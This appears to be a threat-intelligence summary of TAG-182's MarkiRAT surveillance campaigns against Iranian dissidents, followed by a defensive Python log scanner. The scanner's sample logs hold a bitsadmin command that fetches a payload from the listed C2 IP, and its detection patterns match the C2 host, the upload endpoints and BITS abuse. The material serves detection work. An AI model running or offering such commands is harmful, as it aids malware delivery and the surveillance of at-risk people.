Discover how Iranian-nexus threat cluster TAG-182 uses MarkiRAT malware and fake VPN/media apps to conduct cyber surveillance operations against domestic targets.
Analysis Summary
# Threat Actor: TAG-182
## Attribution & Identity
* **Identification:** TAG-182 is an Iranian-nexus threat cluster believed to be a component of Iran’s broader state surveillance ecosystem.
* **Aliases/Associated Groups:** The group exhibits significant tradecraft overlaps with **Ferocious Kitten**.
* **Known Associations:** Linked to the Iranian government’s security apparatus, specifically targeting perceived dissidents and foreign collaborators.
## Activity Summary
Recorded Future’s Insikt Group identified new infrastructure in early to mid-2026 used by TAG-182 to disseminate the **MarkiRAT** surveillance tool. The campaigns followed a period of kinetic conflict (April 2026) and the restoration of internet access in Iran (May 2026). The actor utilizes social media platforms (Instagram) and custom-built staging websites to distribute malicious payloads disguised as utility software.
## Tactics, Techniques & Procedures
* **Social Engineering:** Uses lures such as free download tools and fake VPN applications to trick users.
* **Fake Applications:** Distribution of malicious Android and Windows applications masquerading as legitimate services (e.g., media players, VPNs).
* **BITS Abuse:** Utilization of Windows Background Intelligent Transfer Service (BITS) for file transfers to evade detection.
* **Phishing:** Use of spearphishing links and attachments to drive traffic to staging sites.
* **Persistence & Surveillance:** Capability to capture screenshots and upload local files to C2.
**MITRE ATT&CK Mapping:**
* **T1583.001:** Acquire Infrastructure: Domains
* **T1566.001/.002:** Phishing: Spearphishing Attachment/Link
* **T1204.002:** User Execution: Malicious File
* **T1197:** BITS Jobs
* **T1059.003:** Command and Scripting Interpreter: Windows Command Shell
## Targeting
* **Sectors:** Civil society, human rights, and technology (VPN/Security).
* **Geography:** Primarily Iran (domestic) and Iranians living abroad (diaspora).
* **Victims:** Anti-government networks, activists, human rights advocates, and individuals perceived as dissidents or foreign collaborators.
## Tools & Infrastructure
* **Malware Families:** MarkiRAT (a backdoor/surveillance tool).
* **File Names:** `YEPlayer.dll`, `YEMPlayer.zip`, `Pis2rayVPN.msi`, `YESHICA`.
* **Infrastructure:**
  * **C2 IP:** 212[.]83[.]61[.]198 (Hosted by 23M GmbH / AS47447).
  * **Specific Paths:** `/i.php?u=`, `/uploadx.php?u=`.
## Implications
TAG-182 represents a persistent digital enforcement arm of the Iranian state. The redirection of their focus toward intensified digital surveillance following kinetic conflicts suggests that Iran prioritizes internal stability and the monitoring of dissent via cyber means. Their ability to maintain operations despite public exposure (e.g., reusing "YESHICA" themes) indicates a resilient and well-resourced operational pace.
## Mitigations
* **Endpoint Security:** Deploy EDR solutions to monitor for abuse of `bitsadmin.exe` and unauthorized BITS job creation.
* **App Verification:** Educate users to avoid downloading VPNs or media players from unofficial or third-party websites, particularly those promoted via social media.
* **Network Monitoring:** Block known C2 IPs and monitor for traffic to suspicious PHP endpoints (`/i.php?u=`) associated with MarkiRAT.
* **YARA/Sigma:** Implement specific detection rules (as provided by Insikt Group) to identify MarkiRAT file signatures and process behaviors in the enterprise environment.
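The two detection points the mitigations list, BITS job creation on the endpoint and traffic to the MarkiRAT PHP endpoints, can be checked with a small log-scanning routine. The following is an added example written for this summary; it is not code from the Insikt Group report and does not reproduce their YARA/Sigma rules. The C2 IP and the `/i.php?u=` and `/uploadx.php?u=` paths come from the page (the IP is re-fanged only so it can be string-matched); the proxy and process log layouts, hostnames, usernames and client addresses are constructed for the example, and the list of `bitsadmin` switches treated as "creates or starts a transfer" is the author's choice.

```python
"""Scan constructed proxy and process-creation logs for the MarkiRAT behaviours
named in the TAG-182 summary (added example, not the report's own tooling)."""
import re
from urllib.parse import urlsplit, parse_qs

# Indicators from the page. The defanged 212[.]83[.]61[.]198 is re-fanged for matching.
C2_IPS = {"212.83.61.198"}
# MarkiRAT endpoints named on the page; both were observed with a ?u= parameter.
MARKIRAT_PATHS = {"/i.php", "/uploadx.php"}
MARKIRAT_PARAM = "u"

# bitsadmin switches that create, populate or start a transfer job (T1197).
# Plain "bitsadmin /list" is excluded so routine admin use does not alert.
BITS_SWITCHES = re.compile(r"/(transfer|create|addfile|resume|setnotifycmdline)\b", re.I)

# Constructed, Sysmon-like process-creation layout used by this example only.
PROC_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'image=(?P<image>\S+) cmdline="(?P<cmdline>.*)"$'
)


def check_proxy_line(line):
    """Proxy line: <ts> <client> <method> <url> <status>. Returns an alert dict or None."""
    parts = line.split()
    if len(parts) < 5:
        return None
    ts, client, _method, url, _status = parts[:5]
    u = urlsplit(url)
    reasons = []
    if (u.hostname or "") in C2_IPS:
        reasons.append("known MarkiRAT C2 host")
    if u.path in MARKIRAT_PATHS and MARKIRAT_PARAM in parse_qs(u.query):
        reasons.append(f"MarkiRAT endpoint {u.path}?{MARKIRAT_PARAM}=")
    if not reasons:
        return None
    return {"ts": ts, "source": "proxy", "client": client, "url": url, "reasons": reasons}


def check_process_line(line):
    """Process-creation line in the constructed layout above. Alert dict or None."""
    m = PROC_RE.match(line)
    if not m:
        return None
    basename = m["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if basename != "bitsadmin.exe":
        return None
    cmd = m["cmdline"]
    if not BITS_SWITCHES.search(cmd):
        return None
    reasons = ["bitsadmin.exe transfer job (T1197)"]
    # Escalate when the job pulls from the known C2 host.
    for url in re.findall(r"https?://\S+", cmd):
        if (urlsplit(url).hostname or "") in C2_IPS:
            reasons.append("transfer source is known MarkiRAT C2")
    return {"ts": m["ts"], "source": "process", "host": m["host"],
            "user": m["user"], "cmdline": cmd, "reasons": reasons}


def scan(proxy_lines, process_lines):
    """Run both checks and return every alert raised, in input order."""
    alerts = []
    for line in proxy_lines:
        a = check_proxy_line(line)
        if a:
            alerts.append(a)
    for line in process_lines:
        a = check_process_line(line)
        if a:
            alerts.append(a)
    return alerts


# Constructed sample input; 203.0.113.9 and example.com are documentation-reserved values.
SAMPLE_PROXY = [
    "2026-05-12T10:04:31Z 10.0.0.15 GET http://212.83.61.198/i.php?u=ws07-alice 200",
    "2026-05-12T10:04:40Z 10.0.0.15 POST http://203.0.113.9/uploadx.php?u=ws07-alice 200",
    "2026-05-12T10:05:10Z 10.0.0.22 GET https://www.example.com/index.php?u=1 200",
]
SAMPLE_PROC = [
    r'2026-05-12T10:05:02Z host=WS-07 user=alice image=C:\Windows\System32\bitsadmin.exe '
    r'cmdline="bitsadmin /transfer upd /download /priority normal '
    r'http://212.83.61.198/YEMPlayer.zip C:\Users\alice\YEMPlayer.zip"',
    r'2026-05-12T10:06:15Z host=WS-07 user=alice image=C:\Windows\System32\bitsadmin.exe '
    r'cmdline="bitsadmin /list /allusers"',
    r'2026-05-12T10:07:00Z host=WS-09 user=bob image=C:\Windows\System32\notepad.exe '
    r'cmdline="notepad.exe notes.txt"',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_PROXY, SAMPLE_PROC):
        print(alert["ts"], alert["source"], "; ".join(alert["reasons"]))
```

The proxy check alerts on the endpoint path even when the host is not the listed IP, because the page gives the paths as a separate indicator and infrastructure changes faster than tooling; the second sample line shows that case. The process check requires a transfer-creating switch so that `bitsadmin /list` from an administrator does not fire, and adds a second reason when the transfer source is the known C2, which is the combination the page's TTPs describe.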